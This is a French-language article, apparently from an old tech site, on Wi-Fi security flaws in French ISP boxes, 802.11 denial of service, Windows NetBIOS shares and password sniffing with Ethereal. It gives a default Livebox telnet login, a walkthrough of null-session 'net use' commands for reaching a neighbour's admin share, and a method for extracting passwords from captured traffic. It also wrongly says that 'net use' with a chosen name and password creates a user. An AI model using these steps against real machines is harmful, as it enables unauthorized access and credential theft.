Comment l'information est elle véhiculée ?

Cette question est capitale et suffit presque à elle seule à comprendre les tenants et les aboutissants de la question : quand l'information passe en wireless d'un point à un autre elle est transmise par radiofréquences, dans les airs. Les obstacles qu'elle peut rencontrer en environnement urbain par exemple font que la portée de transmission est toujours, d'une manière ou d'une autre altérée, voir rendue impossible (éloignement géographique trop important).
> Ces données circulent donc dans les airs de manière cryptée (insuffisamment), ou pire ...en clair !

Les failles dues au matériel :

Points d'accès et routeurs : Nous avons vu fleurir ces derniers mois trois types de matériel servant à diffuser votre connexion web afin de créer votre réseau local. Cependant tout matériel a besoin d'être configurer, et ceci n'est pas forcément à la portée de tout le monde. Quand on parle de faiblesses matérielles en wireless, on parle de firmware (à savoir un petit logiciel embarqué qui sert à faire fonctionner ce matériel, à lui donner des fonctionnalités). Ces firmwares ne sont pas exempts de trous de sécurité et autres dysfonctionnements en fonction des matériels qui sy connectent. Pour dialoguer, un point d'accès et une carte wi-fi vont dialoguer de firmware à drivers. Ainsi le driver d'une carte de marque x ne fonctionnera pas forcement de la même manière avec un firmware de marque y ou un firmware de marque x. Il est très important de conserver ceci en tête car c'est la cause de nombreux trobbles de connexion (débits, pertes de signal, authentification dramatiquement longue.

La "Boxmania"

Depuis que Free a lancé la Freebox, tout le monde a suivit, wanadoo avec la livebox, aol avec son AOL box, 9online avec la 9box, Cegetel avec la Cbox ... que valent toutes ces box pour le wi-fi ? Vous allez voir ici que les wifistes sont loin d'être égaux selon la box qu'ils utilisent.

La Freebox :
La Freebox y aura mis le temps mais maintenant ça y'est, elle propose le WPA et le WPA2 depuis trois mois. Première chose à savoir : toutes les Freebox n'offrent pas les mêmes débits en wireless. les V1 et V2 (format magnétoscope des années 80) ne proposent pas le wi-fi du tout. C'est à partir de la V3 que notre Freebox s'est vue équipée d'un port pcmcia pouvant accueillir une carte wi-fi, mais pas n'importe laquelle : une prism 11mb (norme 802.11b). La v3 ne sera pas compatible avec une carte à la norme G, il est donc vivement recommandé d'acheter sa carte via le site de Free pour ne pas avoir de mauvaises surprises car si le chipset de la carte que vous avez acheté dans le commerce n'a pas un chipset prism, n'espérez pas la voir fonctionner. Les freebox V4 séries a et b ne sont toujours pas compatibles avec la norme 802.11g, ceci est arrivé avec la V4c (pour cardbus) : le port pcmcia est abandonné pour un pour Cardbus offrant des débits jusqu'à 54mb. Pour le WPA en revanche pas de problème elles sont toutes compatibles. L'interface de configuration de votre réseau sans fil se situe sur le site de Free, très exactement ici. Notons au passage que Free oblige intelligemment ses clients à activer le cryptage  par wep ou wpa sur cette interface : cette étape apparait comme claire et logique dans le process d'installation. En ce qui concerne la portée de la Freebox, elle n'est pas extraordinaire, une antenne de carte pcmcia étant vraiment ridicule, oubliez cette solution si vous avez des murs épais chez vous et optez pour un routeur autre derrière la freebox avec la possibilité d'adjoindre une antenne. Cependant, si vous ne souhaitez pas que votre réseau soit trop visible de l'extérieur et que vous vivez en agglomération, la Freebox est un très bon choix.

La Livebox :
Il existe deux grandes familles de Livebox : les alcatels et les Sagems. Sagem a fait quelque chose de particulièrement stupide : laisser un accès telnet non documenté ! Lancez un telnet sur l'ip d'une livebox et au prompt tapez "root" en login et "1234" en password...
La Livebos fut la première à proposer le cryptage WPA. sa portée esst meilleure que celle de la Freebox.

Noos :
Pas de box chez noos actuellement mais un super routeur Thomson. Nos amis de chez Noos proposent un routeur dont l'interface par défaut est en anglais... bravo, c'est très fin. Sur Paris le résultat est dévastateur, le nombre de point d'accès ouverts avec un ssid THOMSON est effrayant, si vous ne parlez pas anglais et que vous ne voulez pas offrir vos données personnelles et votre connexion à tout le monde, évitez Noos.

Les implémentations matérielles de la norme 802.11

Les implémentations matérielles de la norme 802.11 sont sujettes à des attaques par deni de service, il s'agit d'une vulnérabilité liée au protocole 802.11x. Cette vulnérabilité peut permettre à une personne mal intentionné une interuption de service total du service wireless. Explications :
Pour limiter les échanges d'informations en wireless et éviter la "collision d'informations", les matérielles sans fil implémentent une fonctionnalité CSMA/CA  (Carrier Sense Multiple Access with Collision Avoidance), liée au Medium Access Control (MAC), cette fonctionnalité limite les transmissions synchrones pouvant perturber le point d'accès. l'une des procédure du protocole liée à cette fonctionnalité est le CCA (Clear Channel Assessment) réalisée par la couche physique de DSSS (Direct Sequence Spread Spectrum). Un attaque sur la couche physique du CCA implique que tous le matériels diffèrent leur transmission car ils deviennent incapable de router correctement les paquets émis, le channel se comporte donc un peu comme un téléphone qui sonnerait occupé. Les implémentations de DSSS sont donc en cause et certains constructeurs ont commencer à réagir, implementant à leur firmware une fonctionnalité anti DoS (Denial of Service), sensée prévenir de ce genre d'attaques. Il est donc très facile pour une personne qui sait à peu prèt ce qu'elle fait de paralyser complètement un réseau sans fil.

Les Failles logicielles :

Un réseau sans fil sert à partager votre connexion ou à échanger des données en réseau local. Problème : un réseau local sans fil est de fait un réseau local très spécial, appelons le "réseau étendu". Sous Windows le cauchemard commence bien souvent avec le partage de fichier et le protocole Netbios. Ce protocole comportant de nombreuses vulnérabilités, il est fortement recommandé de ne pas l'utiliser. Cependant sous Windows il est nécessaire au partage de fichiers, ce qui en fait une porte d'entrée de prédilection.

Démonstration (win98 / 2000):
- Je trouve une connexion wireless : je cherche donc à savoir qui se trouve actuellement sur ce réseau (quelles machines ).
- Un simple sniff (une écoute de ports) avec ethereal peut me renseigner sur la question.
- Ethereal m'informe qu'effectivement je ne suis pas seul et que la machine 192.168.0.34 s'y trouve également.
- je teste le service netbios de cette machine :
avec hping ou par exemple avec la ligne de commande suivante sous windows :
nebstat -a 192.168.0.34
- Bingo : j'obtiens une table avec le nom de la machine
- Je souhaite ensuite visualiser le partage de cette machine :
net view \\192.168.0.34
> on me retourne un gentil message d'erreur (system error has occured, ou la meme en français selon la langue de votre OS) m'invitant à aller me faire cuire un oeuf, c'est ici que ça commence à devenir amusant : windows va se montrer plus conciliant de cette manière :
net use \\192.168.0.34\ipc$ /u:"" ""
Et oui ! vous comprenez maintenant à quoi servent les mots de passes ! la null session fonctionne dans plus de50% des cas
net use \\192.168.0.34\ipc$ /u:"hacker" "uselinux"
Vous venez tout juste de créer un Inconnu "hacker" avec le mot de passe "uselinux" sur la machine 192.168.0.34, si vous obtenez "la commande s'est terminée correctement", vous êtes sur la bonne voie, plus rien ne peut vous arrêter.
net use x: \\192.168.0.34\c$
Nous y sommes : vous pouvez ainsi vous balader dans les repertoires de partage cachés windows et prendre les droits d'administration de la machine...

Bon assez rigolé passons aux choses plus sérieuses que les failles de Windows, nous partons du principe que notre wi-fiste est un geek avertis et qu'il n'a que faire d'un OS percé qui fonctionne mal. Notre geek est loin d'être à l'abri sous Linux ou BSD et c'est ce que nous allons voir maintenant.

The Art of Packet Sniffing :

L'art du packet sniffing,ou de la capture de packet correspond à l'interception d'informations. sur un réseau non crypté ou crypté en wep ce qui revient au meme, , les résultats sont immédiats, capturées sous forme hexadécimale puis restituées en ASCII, un intru obtiendra très facilement les informations qu'il recherche pour s'introduire sur votre machine : les mots de passe.

Démonstration avec Ethereal :

Ethereal est donc un puissant sniffer de packets qui ira capturer à peu prèt toutes les informations émises par ce que peut compter de protocoles interessants votre machine (ftp, arp, icmp, udp, tcp...) : vous comprendrez donc qu'en mode"wireless" il semontrera particulièrement bavard.

- Lancement d'Ethereal :
> J'ouvre une console et je passe en super user
> je lance ethereal (capture1):
# ethereal
> Je paramètre correctement mon soft de manière à lui indiquer mon périphérique de capture (une simple carte wireless à chipset Orinoco ou Prism) (capture2)
> Je lance mon scan : les packets sont visibles (capture3)
> A la fin de ce scan, je peux voir le contenu des packets interceptés sous forme haxadecimale et leur traduction en ASCII à la droite (capture4)
> Les résultats obtenus sont peu lisibles et je souhaite aller directement à ce qui m'interresse : les passwords par exemple. Je ferme ethereal et je sauvegarde en .txt les données capturées, je les ouvre avec un editeur de texte (capture5) :
# emacs /home/monchemindecapture/capture.txt
j'effectue ma recherche avec des termes subtilement choisis "auth passwd", "pass", "passwd", ""password" ....
> si les données intéressantes ont été capturées, vous n'aurez pas de mal à les retrouver.